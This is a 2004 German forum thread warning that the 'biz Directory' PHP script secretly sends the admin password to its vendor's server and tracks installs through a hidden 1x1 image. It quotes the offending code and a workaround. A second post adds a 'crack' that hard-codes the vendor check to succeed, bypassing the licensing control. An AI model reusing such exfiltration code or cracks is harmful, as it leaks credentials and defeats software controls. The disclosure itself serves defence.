mod_rewrite forum

Hilfe bei mod_rewrite, htaccess anderen Problemchen mit dem Apache-Server
http://forum.modrewrite.de/

biz-directory spioniert admin daten aus !!

http://forum.modrewrite.de/viewtopic.php?f=2&t=31

Seite 1 von 1

biz-directory spioniert admin daten aus !!

Verfasst: 31.07.2004 19:53
von bruno
WARNUNG: biz Directory sendet das Administrator Passwort an seinen Hersteller!!

ATTENTION: biz Directory sends Administrator Pass Home!!

include.php -- Zeile 60 (nach Rechts scrollen - scroll to the right)

Code: Alles auswählen

if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); $HTTP_SESSION_VARS['admin'] = true; header("Location: {$dir}admin_edit.php"); }; };


Workaround:

Code: Alles auswählen

if ($pass) { 
   $rand = md5(time()); 
   $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r"); 
   $access = fread($access,4); 
   if ($access == "true") { 
   session_start(); 
   $HTTP_SESSION_VARS['admin'] = true; 
   header("Location: {$dir}admin_edit.php"); 
   }; 
};


Bitte auch beachten:
Also take a look at:

install4.php Zeile 62

Code: Alles auswählen

<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>


Hier wird mittels hidden.gif eure Seite als REFERER übermittelt !
With a hidden.gif your Site is send via REFERER !

Quelle

Bruno

BIZ-Dir crack V.2

Verfasst: 07.08.2004 10:32
von Jahuu
include.php -- Zeile 60 (nach Rechts scrollen - scroll to the right)
Code:

Code: Alles auswählen

if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); $HTTP_SESSION_VARS['admin'] = true; header("Location: {$dir}admin_edit.php"); }; };


Workaround:
Code:

Code: Alles auswählen

if ($pass) { 
   $rand = md5(time()); 
   $access = fopen ("http://www.directory-search.org/include_variables.php?p=$rand","r"); 
   $access = fread($access,4); 
   if ($access == "true") { 
   session_start(); 
   $HTTP_SESSION_VARS['admin'] = true; 
   header("Location: {$dir}admin_edit.php"); 
   }; 
};


Bitte auch beachten:


Warum überhaupt noch eine Verbindung zum "Hersteller" aufnehmen? :lol:

-> CRack ohne http-Verbindungsaufbau:

Code: Alles auswählen

if ($pass) { 
   $access = "true";
   if ($access == "true") { 
      session_start(); 
      $HTTP_SESSION_VARS['admin'] = true; 
      header("Location: {$dir}admin_edit.php"); 
   }; 
};


Nichts für ungut! 8)

mfg
Jahuu

Verfasst: 17.01.2010 17:48
von crashbraker
Hallo Leute,

was ist eine Biz-Directory ???
Könnt ihr mir dies bitte genauer erläutern und warum Cracken usw., verstehe wirklich den Sinn nicht.

Bitte um Antwort !!!

MfG
Daniel
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de